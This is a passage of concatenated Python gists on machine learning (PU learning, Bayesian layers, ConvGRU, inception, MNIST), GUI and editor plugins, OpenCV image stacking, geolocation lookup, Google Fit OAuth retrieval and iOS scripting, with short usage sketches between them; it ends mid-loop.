train_loader = torch.utils.data.DataLoader(train_ds, batch_size=64, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(val_ds, batch_size=64, shuffle=True, **kwargs)
```
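A short sketch of consuming `val_loader` in an evaluation pass, assuming a reasonably recent PyTorch (`no_grad`, `reduction='sum'`); the model and metric choices are placeholders, not part of the gist:
```python
# Hypothetical validation pass: average NLL loss and accuracy over val_loader.
import torch
import torch.nn.functional as F

def evaluate(model, loader):
    model.eval()
    total_loss, correct = 0.0, 0
    with torch.no_grad():
        for data, target in loader:
            output = model(data)
            total_loss += F.nll_loss(output, target, reduction='sum').item()
            correct += (output.argmax(dim=1) == target).sum().item()
    n = len(loader.dataset)
    return total_loss / n, correct / n
```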
#### File: hard-gists/9fbbf2f450779bde60c3/snippet.py
```python
import numpy as np
from numpy import random
from sklearn import base
class PUWrapper(object):
def __init__(self,trad_clf,n_fold=5):
self._trad_clf=trad_clf
self._n_fold=n_fold
def fit(self,X,s):
self._trad_clf.fit(X,s)
Xp=X[s==1]
n=len(Xp)
cv_split=np.arange(n)*self._n_fold/n
cv_index=cv_split[random.permutation(n)]
cs=np.zeros(self._n_fold)
for k in xrange(self._n_fold):
Xptr=Xp[cv_index==k]
cs[k]=np.mean(self._trad_clf.predict_proba(Xptr)[:,1])
self.c_=cs.mean()
return self
def predict_proba(self,X):
proba=self._trad_clf.predict_proba(X)
return proba
def predict(self,X):
proba=self.predict_proba(X)[:,1]
return proba>=(0.5*self.c_)
```
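A quick smoke test on synthetic positive-unlabeled data, with scikit-learn's LogisticRegression standing in for the traditional classifier; all numbers are invented for illustration, and note the gist itself is Python 2 (`xrange`, integer division in `cv_split`):
```python
# Hypothetical PU demo: hide ~70% of the positive labels and let the wrapper
# estimate c = P(s=1 | y=1) from the held-out labeled positives.
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.RandomState(0)
n = 2000
X = rng.randn(n, 2)
y = (X[:, 0] + X[:, 1] > 0).astype(int)      # true labels (never observed)
s = y * (rng.rand(n) < 0.3)                  # only ~30% of positives carry a label

clf = PUWrapper(LogisticRegression())
clf.fit(X, s)
print(clf.c_)                  # should land near the 0.3 labeling frequency
print(clf.predict(X).mean())   # fraction predicted positive, near 0.5
```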
#### File: hard-gists/a003ace716c278ab87669f2fbd37727b/snippet.py
```python
import math
from functools import wraps
from theano import tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from lasagne import init
from lasagne.random import get_rng
__all__ = ['Accumulator', 'NormalApproximation', 'NormalApproximationScMix', 'bbpwrap']
c = - 0.5 * math.log(2 * math.pi)
def log_normal(x, mean, std, eps=0.0):
std += eps
return c - T.log(T.abs_(std)) - (x - mean) ** 2 / (2 * std ** 2)
def log_normal3(x, mean, rho, eps=0.0):
std = T.log1p(T.exp(rho))
return log_normal(x, mean, std, eps)
class Accumulator(object):
def __init__(self):
"""
A simple class for accumulating any cost
Used in layers with BayesianMeta
"""
self.srng = RandomStreams(get_rng().randint(1, 2147462579))
self.total = []
def get_cost(self):
return sum(map(T.sum,self.total))
def add_cost(self, new):
self.total.append(new)
class NormalApproximation(object):
def __init__(self, pm=0, pstd=T.exp(-3)):
self.pm = pm
self.pstd = pstd
def log_prior(self, x):
return log_normal(x, self.pm, self.pstd)
def __call__(self, layer, spec, shape, **tags):
# case when user uses default init specs
if not isinstance(spec, dict):
spec = {'mu': spec}
# important!
# we declare that params we add next
# are the ones we need to fit the distribution
tags['variational'] = True
rho_spec = spec.get('rho', init.Normal(1))
mu_spec = spec.get('mu', init.Normal(1))
rho = layer.add_param(rho_spec, shape, **tags)
mean = layer.add_param(mu_spec, shape, **tags)
e = layer.acc.srng.normal(shape, std=1)
W = mean + T.log1p(T.exp(rho)) * e
q_p = self.log_posterior_approx(W, mean, rho) - self.log_prior(W)
layer.acc.add_cost(q_p)
return W
@staticmethod
def log_posterior_approx(W, mean, rho):
return log_normal3(W, mean, rho)
class NormalApproximationScMix(NormalApproximation):
def __init__(self, pm1=.0, pstd1=.5, pi=.5, pm2=.0, pstd2=1e-3):
"""
:param pi:
weight for first Gaussian
pi is in [0, 1]
:param pm1: float
prior mean for first Gaussian
:param std1:
prior std for first Gaussian
:param pm2:
prior mean for second Gaussian
:param std2:
prior std for second Gaussian
"""
assert .0 <= pi <= 1., 'Weight %d not in [0, 1]' % pi
self.pi = pi
self.pm1 = pm1
self.pstd1 = pstd1
self.pm2 = pm2
self.pstd2 = pstd2
def log_prior(self, x):
return self.pi * log_normal(x, self.pm1, self.pstd1) + \
(1 - self.pi) * log_normal(x, self.pm2, self.pstd2)
def bbpwrap(approximation=NormalApproximation()):
def decorator(cls):
def add_param_wrap(add_param):
@wraps(add_param)
def wrapped(self, spec, shape, name=None, **tags):
# we should take care about some user specification
# to avoid bbp hook just set tags['variational'] = True
if not tags.get('trainable', True) or tags.get('variational', False):
return add_param(self, spec, shape, name, **tags)
else:
# they don't need to be regularized, strictly
tags['regularizable'] = False
param = self.approximation(self, spec, shape, **tags)
return param
return wrapped
def init_wrap(__init__):
@wraps(__init__)
def wrapped(self, acc, *args, **kwargs):
self.acc = acc # type: Accumulator
__init__(self, *args, **kwargs)
return wrapped
cls.approximation = approximation
cls.add_param = add_param_wrap(cls.add_param)
cls.__init__ = init_wrap(cls.__init__)
return cls
return decorator
```
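A sketch of how the decorator might be applied to a Lasagne layer; the network shape and the way the accumulated KL cost is scaled into the loss are illustrative assumptions, not taken from the gist:
```python
# Hypothetical Bayes-by-backprop MLP: the decorator reroutes add_param so each
# weight is sampled from a learned Gaussian posterior, and the per-parameter
# KL terms land in the shared Accumulator.
from theano import tensor as T
import lasagne
from lasagne import layers, nonlinearities

@bbpwrap(NormalApproximation())
class BayesDenseLayer(layers.DenseLayer):
    pass

acc = Accumulator()
l_in = layers.InputLayer((None, 784))
l_hid = BayesDenseLayer(acc, l_in, num_units=256, nonlinearity=nonlinearities.rectify)
l_out = BayesDenseLayer(acc, l_hid, num_units=10, nonlinearity=nonlinearities.softmax)

x = T.matrix('x')
t = T.ivector('t')
p = layers.get_output(l_out, x)
n_batches = 500  # assumed minibatches per epoch; weights the KL term
loss = lasagne.objectives.categorical_crossentropy(p, t).mean() + acc.get_cost() / n_batches
```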
#### File: hard-gists/a027a9fc5aac66e6a382/snippet.py
```python
import wx
import serial
# A new custom class that extends the wx.Frame
class MyFrame(wx.Frame):
def __init__(self, parent, title):
super(MyFrame, self).__init__(parent, title=title,
size=(250, 150))
# Attach the paint event to the frame
self.Bind(wx.EVT_PAINT, self.OnPaint)
# Create a timer for redrawing the frame every 100 milliseconds
self.Timer = wx.Timer(self)
self.Timer.Start(100)
self.Bind(wx.EVT_TIMER, self.OnPaint)
# Show the frame
self.Centre()
self.Show()
def OnPaint(self, event=None):
# Create the paint surface
dc = wx.PaintDC(self)
# Refresh the display
self.Refresh()
        # Get data from serial port (readline() returns a text line, so convert it to a number)
        value = int(arduino.readline())
# Draw the serial data
# Set up colors:
thickness = 4
border_color = "#990000"
fill_color = "#FF944D"
dc.SetPen(wx.Pen(border_color, thickness))
dc.SetBrush(wx.Brush(fill_color))
# Draw a line
dc.DrawLine(50, 40, 50+value, 40)
# Draw a rectangle
dc.DrawRectangle(50,50,value,50)
# Main program
if __name__ == '__main__':
# Connect to serial port first
try:
arduino = serial.Serial('/dev/tty.usbmodem1421', 9600)
except:
print "Failed to connect"
exit()
# Create and launch the wx interface
app = wx.App()
MyFrame(None, 'Serial data test')
app.MainLoop()
# Close the serial connection
arduino.close()
```
#### File: hard-gists/a303721443f5eb46035e/snippet.py
```python
import Skype4Py
def Commands(message, status):
if status == 'SENT' or (status == 'RECEIVED'):
print message.Body
skype = Skype4Py.Skype()
skype.OnMessageStatus = Commands
skype.Attach()
while True:
pass
```
#### File: hard-gists/a5407ce6b5061525e7f2/snippet.py
```python
import sublime, sublime_plugin, time
from os.path import splitext
from os.path import isfile
currentFile = ''
debug = False
class MoveWindowCommand(sublime_plugin.EventListener):
def on_load(self, view):
global currentFile, debug
if view.file_name() == None:
return False
window = sublime.active_window()
if window.num_groups() != 4:
return None
if view.file_name() == currentFile:
return False
currentFile = view.file_name()
if (debug):
print('on_load(): ' + view.file_name())
group, index = window.get_view_index(view)
fileName, fileExtension = splitext(view.file_name())
if fileExtension == '.xml':
window.set_view_index(view, 2, 0)
elif fileExtension == '.tss':
window.set_view_index(view, 1, 0)
elif fileExtension == '.js':
isLib = True
window.set_view_index(view, 0, 0)
window.open_file(view.file_name())
if isfile(fileName.replace('/controllers/','/views/')+'.xml'):
isLib = False
window.open_file(fileName.replace('/controllers/','/views/')+'.xml')
if isfile(fileName.replace('/controllers/','/styles/')+'.tss'):
isLib = False
window.open_file(fileName.replace('/controllers/','/styles/')+'.tss')
if isLib:
window.set_view_index(view, 3, 0)
else:
window.set_view_index(view, 0, 0)
else :
window.set_view_index(view, 3, 0)
window.focus_view(view)
window.focus_group(0)
def on_close(self, view):
global currentFile, debug
if view.file_name() == None:
return None
if (debug):
print('on_close(): ' + view.file_name())
window = sublime.active_window()
if window.num_groups() != 4:
return None
fileName, fileExtension = splitext(view.file_name())
if fileExtension != '.js':
return None
if view.file_name().find("controllers") == -1:
return None
if not isfile(fileName.replace('/controllers/','/views/') + '.xml') or not isfile(fileName.replace('/controllers/','/styles/') + '.tss'):
return None
xmlFileView = window.find_open_file(fileName.replace('/controllers/','/views/')+'.xml')
window.focus_view(xmlFileView)
window.run_command('close_file')
tssFileView = window.find_open_file(fileName.replace('/controllers/','/styles/')+'.tss')
window.focus_view(tssFileView)
window.run_command('close_file')
def on_activated(self, view):
global currentFile, debug
if view.file_name() == None:
return None
if (debug):
print('on_activated(): ' + view.file_name())
window = sublime.active_window()
if window.num_groups() != 4:
return None
group, index = window.get_view_index(view)
fileName, fileExtension = splitext(view.file_name())
if fileExtension != '.js':
return None
if view.file_name() == currentFile:
return None
currentFile = view.file_name()
if (debug):
print('on_activated() - pass: ' + view.file_name())
if view.file_name().find("controllers") != -1 and fileExtension == '.js':
if isfile(fileName.replace('/controllers/','/styles/')+'.tss'):
tssFileView = window.find_open_file(fileName.replace('/controllers/','/styles/')+'.tss')
if tssFileView == None:
return False
sublime.set_timeout(lambda: window.set_view_index(tssFileView, 1, index), 0)
sublime.set_timeout(lambda: window.focus_view(tssFileView), 0)
if isfile(fileName.replace('/controllers/','/views/')+'.xml'):
xmlFileView = window.find_open_file(fileName.replace('/controllers/','/views/')+'.xml')
if xmlFileView == None:
return False
sublime.set_timeout(lambda: window.set_view_index(xmlFileView, 2, index), 1)
sublime.set_timeout(lambda: window.focus_view(xmlFileView), 1)
sublime.set_timeout(lambda: window.focus_group(0), 2)
```
#### File: hard-gists/a5f57e8c9d0aedee285fb6f43cb5900c/snippet.py
```python
import numpy as np
import cv2
from sys import argv
# Gaussian radius (should really be an argument):
r = 21
src, dst = argv[1:]
def get_sharpness(img):
img = img.mean(axis=2)
blurred = cv2.GaussianBlur(img, (r, r), 0)
sharp = np.abs(img - blurred)
return sharp
viddy = cv2.VideoCapture(src)
width = int(viddy.get(3)) # can you tell this API is by C programmers?
height = int(viddy.get(4))
frame_count = int(viddy.get(7))
best_pixels = np.zeros((height, width, 3))  # 3 channels
best_sharpness = np.zeros((height, width))  # start from zero so the first frame's pixels always win initially
for frame_n in range(frame_count):
print "%s/%s" % (frame_n, frame_count)
okay, frame = viddy.read()
if not okay: break
if frame_n == 0:
best_pixels = frame
sharpness = get_sharpness(frame)
better_indexes = np.where(sharpness > best_sharpness)
best_pixels[better_indexes] = frame[better_indexes]
best_sharpness[better_indexes] = sharpness[better_indexes]
cv2.imwrite(dst, best_pixels)
```
#### File: hard-gists/a67517621c2a9d4c2f14/snippet.py
```python
from decimal import Decimal
from geopy.distance import great_circle # or distance
from seuapp.models import Store
# decimal places degrees distance
# --------------- ------- --------
# 0 1 111 km
# 1 0.1 11.1 km
# 2 0.01 1.11 km
# 3 0.001 111 m
# 4 0.0001 11.1 m
# 5 0.00001 1.11 m
# 6 0.000001 11.1 cm
#
# Model fields must looks like:
# # lat/long with 6 decimal places lead to precision of ~0.11 meters.
# lat = DecimalField(
# max_digits=10, decimal_places=6,
# validators=[
# MinValueValidator(
# -90, _("Latitude values must be greater than -90.")
# ),
# MaxValueValidator(90, _("Latitude values must be lower than 90."))
# ]
# )
# lng = DecimalField(
# max_digits=10, decimal_places=6,
# validators=[
# MinValueValidator(
# -180, _("Longitude values must be greater than -180.")
# ),
# MaxValueValidator(
# 180, _("Longitude values must be lower than 180.")
# )
# ]
# )
PRECISION_MAP = {
0: Decimal('1.0'), # -/+ 111 km
1: Decimal('0.1'), # -/+ 11.1 km
2: Decimal('0.01'), # -/+ 1.11 km
3: Decimal('0.001'), # -/+ 111 m
4: Decimal('0.0001'), # -/+ 11.1 m
5: Decimal('0.00001'), # -/+ 1.11 m
6: Decimal('0.000001') # -/+ 11.1 cm
}
def find_nearest_store(lat, lng):
"""
Find nearest store to given latitude/longitude.
"""
store = None
    precision = 6
while store is None:
        results = {}  # maps great-circle distance -> Store for this search window
# now I would love a graph database ;)
        _range = PRECISION_MAP[precision]
stores = Store.objects.filter(
# Here we search around a range. 9 is a modifier in _range to
# be a bit more wide, specially in depth precisions. More stations
# per loop means less queries.
lat__gt=lat - (_range * 9), lat__lt=lat + (_range * 9),
lng__gt=lng - (_range * 9), lng__lt=lng + (_range * 9)
)
for _store in stores:
d = great_circle((lat, lng), (_store.lat, _store.lng))
results[d] = _store
if results:
            store = results[min(results)]  # pick the store at the smallest distance
break
else:
            precision -= 1
return store
```
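A quick illustration of calling the helper above (coordinates are arbitrary; `Store` rows must already exist in the database for a match to come back):
```python
# Arbitrary query point, using the same Decimal convention as the model fields.
lat, lng = Decimal('-23.550520'), Decimal('-46.633308')
nearest = find_nearest_store(lat, lng)
if nearest is not None:
    print('Nearest store: %s at (%s, %s)' % (nearest, nearest.lat, nearest.lng))
```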
#### File: hard-gists/a86b412988cbf5216aa5c48b1cf439c4/snippet.py
```python
import re
import clipboard
import console
import webbrowser
import urllib
import contacts
import datetime
import dialogs
def extract_num(input):
match = re.findall("[0-9*]",input)
return ''.join(match)
# Fetch text from clipboard and extract what looks like a phone number
input = clipboard.get()
match = re.search("[0-9\+\-\ ]{7,}",input)
output = match.group(0)
clipboard.set(output)
console.hud_alert(output,icon='success',duration=1)
# Check if the number exists in the phonebook
people = contacts.get_all_people()
found = False
for p in people:
for n in p.phone:
# Numbers can be stored strangely in contacts so just check the last 9 digits
num = extract_num(output)
cleannum = extract_num(n[1])
if (num[-9:] == cleannum[-9:]):
found = True
# Pop a form to add the contact if not found
if not found:
fields = [ {'type':'text','key':'first','value':'','title':'First Name'},{'type':'text','key':'last','value':'','title':'Last Name'},{'type':'text','key':'org','value':'','title':'Organisation'},{'type':'text','key':'num','value':output,'title':'Number'}, {'type':'text','key':'note','value':'Added by Make Call script on '+datetime.datetime.now().ctime(),'title':'Notes'} ]
fields = dialogs.form_dialog('Add a Contact', fields)
newContact = contacts.Person()
newContact.note = fields['note']
newContact.first_name = fields['first']
newContact.last_name = fields['last']
newContact.organization = fields['org']
newContact.phone = [(contacts.WORK,fields['num'])]
contacts.add_person(newContact)
contacts.save()
# Call the number
webbrowser.open('tel:'+urllib.quote(output))
```
#### File: hard-gists/a8c96f1aeb41393dadf6/snippet.py
```python
import json
import httplib2
from datetime import datetime
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
# Copy your credentials from the Google Developers Console
CLIENT_ID = 'XXXXXXXXXXXXXXXXXX.apps.googleusercontent.com'
CLIENT_SECRET = '<KEY>'
# Check https://developers.google.com/fit/rest/v1/reference/users/dataSources/datasets/get
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/fitness.activity.read'
# DATA SOURCE
DATA_SOURCE = "derived:com.google.step_count.delta:com.google.android.gms:estimated_steps"
# The ID is formatted like: "startTime-endTime" where startTime and endTime are
# 64 bit integers (epoch time with nanoseconds).
DATA_SET = "1051700038292387000-1451700038292387000"
# Redirect URI for installed apps
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
def retrieve_data():
"""
Run through the OAuth flow and retrieve credentials.
Returns a dataset (Users.dataSources.datasets):
https://developers.google.com/fit/rest/v1/reference/users/dataSources/datasets
"""
flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, OAUTH_SCOPE, REDIRECT_URI)
authorize_url = flow.step1_get_authorize_url()
print 'Go to the following link in your browser:'
print authorize_url
code = raw_input('Enter verification code: ').strip()
credentials = flow.step2_exchange(code)
# Create an httplib2.Http object and authorize it with our credentials
http = httplib2.Http()
http = credentials.authorize(http)
fitness_service = build('fitness', 'v1', http=http)
return fitness_service.users().dataSources(). \
datasets(). \
get(userId='me', dataSourceId=DATA_SOURCE, datasetId=DATA_SET). \
execute()
def nanoseconds(nanotime):
"""
Convert epoch time with nanoseconds to human-readable.
"""
dt = datetime.fromtimestamp(nanotime // 1000000000)
return dt.strftime('%Y-%m-%d %H:%M:%S')
if __name__ == "__main__":
# Point of entry in execution mode:
dataset = retrieve_data()
with open('dataset.txt', 'w') as outfile:
json.dump(dataset, outfile)
last_point = dataset["point"][-1]
print "Start time:", nanoseconds(int(last_point.get("startTimeNanos", 0)))
print "End time:", nanoseconds(int(last_point.get("endTimeNanos", 0)))
print "Data type:", last_point.get("dataTypeName", None)
print "Steps:", last_point["value"][0].get("intVal", None)
```
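Since the dataset ID is just two epoch-nanosecond timestamps joined by a dash, a small helper (not part of the original snippet) can build it from ordinary UTC datetimes:
```python
from datetime import datetime

def dataset_id(start, end):
    """Build a Google Fit dataset ID ("startNanos-endNanos") from two UTC datetimes."""
    to_nanos = lambda dt: int((dt - datetime(1970, 1, 1)).total_seconds() * 1e9)
    return "%d-%d" % (to_nanos(start), to_nanos(end))

# Example: everything recorded during 2015 (UTC).
print(dataset_id(datetime(2015, 1, 1), datetime(2016, 1, 1)))
```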
#### File: hard-gists/acbd669af86ecb8f988325084ba7a749/snippet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as f
import torch.nn.init as init
from torch.autograd import Variable
class ConvGRUCell(nn.Module):
"""
Generate a convolutional GRU cell
"""
def __init__(self, input_size, hidden_size, kernel_size):
super().__init__()
padding = kernel_size // 2
self.input_size = input_size
self.hidden_size = hidden_size
self.reset_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
self.update_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
self.out_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)
init.orthogonal(self.reset_gate.weight)
init.orthogonal(self.update_gate.weight)
init.orthogonal(self.out_gate.weight)
init.constant(self.reset_gate.bias, 0.)
init.constant(self.update_gate.bias, 0.)
init.constant(self.out_gate.bias, 0.)
def forward(self, input_, prev_state):
# get batch and spatial sizes
batch_size = input_.data.size()[0]
spatial_size = input_.data.size()[2:]
# generate empty prev_state, if None is provided
if prev_state is None:
state_size = [batch_size, self.hidden_size] + list(spatial_size)
prev_state = Variable(torch.zeros(state_size)).cuda()
# data size is [batch, channel, height, width]
stacked_inputs = torch.cat([input_, prev_state], dim=1)
update = f.sigmoid(self.update_gate(stacked_inputs))
reset = f.sigmoid(self.reset_gate(stacked_inputs))
out_inputs = f.tanh(self.out_gate(torch.cat([input_, prev_state * reset], dim=1)))
new_state = prev_state * (1 - update) + out_inputs * update
return new_state
```
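A small CPU smoke test for the cell above (shapes are arbitrary); the initial state is passed explicitly as zeros because the cell's default state creation calls `.cuda()`:
```python
# Assumes torch, Variable and ConvGRUCell from the snippet above are in scope.
x = Variable(torch.randn(2, 8, 16, 16))        # [batch, channels, height, width]
state = Variable(torch.zeros(2, 32, 16, 16))   # explicit zero state keeps this CPU-only
cell = ConvGRUCell(input_size=8, hidden_size=32, kernel_size=3)
new_state = cell(x, state)
print(new_state.size())  # torch.Size([2, 32, 16, 16])
```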
#### File: hard-gists/ae2a7adaab133c61a059/snippet.py
```python
import lasagne as nn
Conv2DLayer = nn.layers.Conv2DDNNLayer
def inception_module(l_in, num_1x1, reduce_3x3, num_3x3, reduce_5x5, num_5x5, gain=1.0, bias=0.1):
"""
inception module (without the 3x3s1 pooling and projection because that's difficult in Theano right now)
"""
shape = l_in.get_output_shape()
out_layers = []
# 1x1
if num_1x1 > 0:
l_1x1 = nn.layers.NINLayer(l_in, num_units=num_1x1, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_1x1)
# 3x3
if num_3x3 > 0:
if reduce_3x3 > 0:
l_reduce_3x3 = nn.layers.NINLayer(l_in, num_units=reduce_3x3, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
else:
l_reduce_3x3 = l_in
l_3x3 = Conv2DLayer(l_reduce_3x3, num_filters=num_3x3, filter_size=(3, 3), border_mode="same", W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_3x3)
# 5x5
if num_5x5 > 0:
if reduce_5x5 > 0:
l_reduce_5x5 = nn.layers.NINLayer(l_in, num_units=reduce_5x5, W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
else:
l_reduce_5x5 = l_in
l_5x5 = Conv2DLayer(l_reduce_5x5, num_filters=num_5x5, filter_size=(5, 5), border_mode="same", W=nn.init.Orthogonal(gain), b=nn.init.Constant(bias))
out_layers.append(l_5x5)
# stack
l_out = nn.layers.concat(out_layers)
return l_out
```
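A usage sketch for the module above, assuming an older Lasagne where layers expose `get_output_shape()` and `Conv2DDNNLayer` is available (filter counts are arbitrary):
```python
# Build one inception block on top of a dummy input layer.
l_in = nn.layers.InputLayer((None, 192, 28, 28))
l_incep = inception_module(l_in,
                           num_1x1=64,
                           reduce_3x3=96, num_3x3=128,
                           reduce_5x5=16, num_5x5=32)
print(l_incep.get_output_shape())  # (None, 224, 28, 28): 64 + 128 + 32 channels
```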
#### File: hard-gists/af5bc4fae39b16f8d505/snippet.py
```python
bl_info = {
"name": "Import multiple OBJ files",
"author": "poor, JuhaW",
"version": (0, 2, 0),
"blender": (2, 76, 0),
"location": "File > Import-Export",
"description": "Import multiple OBJ files, UV's, materials",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Import-Export"}
import bpy
import os
from bpy_extras.io_utils import ImportHelper
from bpy.props import (BoolProperty,
FloatProperty,
StringProperty,
EnumProperty,
CollectionProperty
)
class ImportMultipleObjs(bpy.types.Operator, ImportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "import_scene.multiple_objs"
bl_label = "Import multiple OBJ's"
bl_options = {'PRESET', 'UNDO'}
# ImportHelper mixin class uses this
filename_ext = ".obj"
filter_glob = StringProperty(
default="*.obj",
options={'HIDDEN'},
)
# Selected files
files = CollectionProperty(type=bpy.types.PropertyGroup)
# List of operator properties, the attributes will be assigned
# to the class instance from the operator settings before calling.
ngons_setting = BoolProperty(
name="NGons",
description="Import faces with more than 4 verts as ngons",
default=True,
)
edges_setting = BoolProperty(
name="Lines",
description="Import lines and faces with 2 verts as edge",
default=True,
)
smooth_groups_setting = BoolProperty(
name="Smooth Groups",
description="Surround smooth groups by sharp edges",
default=True,
)
split_objects_setting = BoolProperty(
name="Object",
description="Import OBJ Objects into Blender Objects",
default=True,
)
split_groups_setting = BoolProperty(
name="Group",
description="Import OBJ Groups into Blender Objects",
default=True,
)
groups_as_vgroups_setting = BoolProperty(
name="Poly Groups",
description="Import OBJ groups as vertex groups",
default=False,
)
image_search_setting = BoolProperty(
name="Image Search",
description="Search subdirs for any associated images "
"(Warning, may be slow)",
default=True,
)
split_mode_setting = EnumProperty(
name="Split",
items=(('ON', "Split", "Split geometry, omits unused verts"),
('OFF', "Keep Vert Order", "Keep vertex order from file"),
),
)
clamp_size_setting = FloatProperty(
name="Clamp Size",
description="Clamp bounds under this value (zero to disable)",
min=0.0, max=1000.0,
soft_min=0.0, soft_max=1000.0,
default=0.0,
)
axis_forward_setting = EnumProperty(
name="Forward",
items=(('X', "X Forward", ""),
('Y', "Y Forward", ""),
('Z', "Z Forward", ""),
('-X', "-X Forward", ""),
('-Y', "-Y Forward", ""),
('-Z', "-Z Forward", ""),
),
default='-Z',
)
axis_up_setting = EnumProperty(
name="Up",
items=(('X', "X Up", ""),
('Y', "Y Up", ""),
('Z', "Z Up", ""),
('-X', "-X Up", ""),
('-Y', "-Y Up", ""),
('-Z', "-Z Up", ""),
),
default='Y',
)
scale_setting = FloatProperty(
name="Size",
description="Scale objects",
min=0.0, max=1000.0,
soft_min=0.0, soft_max=1000.0,
default=1,
)
center_origin = BoolProperty(
name = "Center Origin",
default=True
)
def draw(self, context):
layout = self.layout
row = layout.row(align=True)
row.prop(self, "ngons_setting")
row.prop(self, "edges_setting")
layout.prop(self, "smooth_groups_setting")
box = layout.box()
row = box.row()
row.prop(self, "split_mode_setting", expand=True)
row = box.row()
if self.split_mode_setting == 'ON':
row.label(text="Split by:")
row.prop(self, "split_objects_setting")
row.prop(self, "split_groups_setting")
else:
row.prop(self, "groups_as_vgroups_setting")
row = layout.split(percentage=0.67)
row.prop(self, "clamp_size_setting")
layout.prop(self, "axis_forward_setting")
layout.prop(self, "axis_up_setting")
layout.prop(self, "image_search_setting")
row = layout.split(percentage=0.5)
row.prop(self, "scale_setting")
row.prop(self, "center_origin")
def execute(self, context):
# get the folder
folder = (os.path.dirname(self.filepath))
# iterate through the selected files
for j, i in enumerate(self.files):
# generate full path to file
path_to_file = (os.path.join(folder, i.name))
# call obj operator and assign ui values
bpy.ops.import_scene.obj(filepath = path_to_file,
axis_forward = self.axis_forward_setting,
axis_up = self.axis_up_setting,
use_edges = self.edges_setting,
use_smooth_groups = self.smooth_groups_setting,
use_split_objects = self.split_objects_setting,
use_split_groups = self.split_groups_setting,
use_groups_as_vgroups = self.groups_as_vgroups_setting,
use_image_search = self.image_search_setting,
split_mode = self.split_mode_setting,
global_clamp_size = self.clamp_size_setting)
if self.center_origin: bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
bpy.ops.transform.resize(value=(self.scale_setting,self.scale_setting,self.scale_setting), constraint_axis=(False, False, False))
bpy.ops.object.transform_apply(location=False, rotation=False, scale=True)
return {'FINISHED'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(ImportMultipleObjs.bl_idname, text="Wavefont Batch (.obj)")
def register():
bpy.utils.register_class(ImportMultipleObjs)
bpy.types.INFO_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(ImportMultipleObjs)
bpy.types.INFO_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
# test call
#bpy.ops.import_scene.multiple_objs('INVOKE_DEFAULT')
```
#### File: hard-gists/b0c075cfde406280cbf7/snippet.py
```python
from objc_util import *
import console  # needed for the console.input_alert fallback below
ObjCClass('NSBundle').bundleWithPath_('/System/Library/Frameworks/LocalAuthentication.framework').load()
context = ObjCClass('LAContext').alloc().init()
policy = 1 # 1 = biometrics only (Touch ID), 2 = biometrics or device passcode
reason = 'We need your fingerprint to ste...ehm... to log you in'
def funct(_cmd,success,error):
if success:
        print 'Authenticated!'
else:
autherr= ObjCInstance(error).localizedDescription()
if str(autherr).startswith('Fallback'):
if console.input_alert('Password') == '<PASSWORD>':
print 'Authenticated!'
else:
print 'WRONG PSW'
if str(autherr).startswith('Application retry'):
print('Wrong Fingerprint!')
if str(autherr).startswith('Biometry'):
print('Too many wrong fingerprints!!')
else:
print autherr
handler=ObjCBlock(funct,restype=None,argtypes=[c_void_p,c_void_p,c_void_p])
context.evaluatePolicy_localizedReason_reply_(policy,reason,handler)
```
#### File: hard-gists/b27cdbff68870418bdb8cefa86a2d558/snippet.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
## load mnist dataset
root = './data'
download = False
trans = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
train_set = dset.MNIST(root=root, train=True, transform=trans, download=download)
test_set = dset.MNIST(root=root, train=False, transform=trans)
batch_size = 128
kwargs = {'num_workers': 1, 'pin_memory': True}
train_loader = torch.utils.data.DataLoader(
dataset=train_set,
batch_size=batch_size,
shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
dataset=test_set,
batch_size=batch_size,
shuffle=False, **kwargs)
print '==>>> total training batch number: {}'.format(len(train_loader))
print '==>>> total testing batch number: {}'.format(len(test_loader))
## network
class MLPNet(nn.Module):
def __init__(self):
super(MLPNet, self).__init__()
self.fc1 = nn.Linear(28*28, 500)
self.fc2 = nn.Linear(500, 256)
self.fc3 = nn.Linear(256, 10)
        self.criterion = nn.CrossEntropyLoss()
def forward(self, x, target):
x = x.view(-1, 28*28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
        loss = self.criterion(x, target)
return x, loss
def name(self):
return 'mlpnet'
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.Linear(4*4*50, 500)
self.fc2 = nn.Linear(500, 10)
        self.criterion = nn.CrossEntropyLoss()
def forward(self, x, target):
x = self.conv1(x)
x = F.max_pool2d(x, 2, 2)
x = F.relu(x)
x = self.conv2(x)
x = F.max_pool2d(x, 2, 2)
x = F.relu(x)
x = x.view(-1, 4*4*50)
x = self.fc1(x)
x = self.fc2(x)
        loss = self.criterion(x, target)
return x, loss
def name(self):
return 'lenet'
## training
model = MLPNet().cuda()
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
for epoch in xrange(10):
    # training
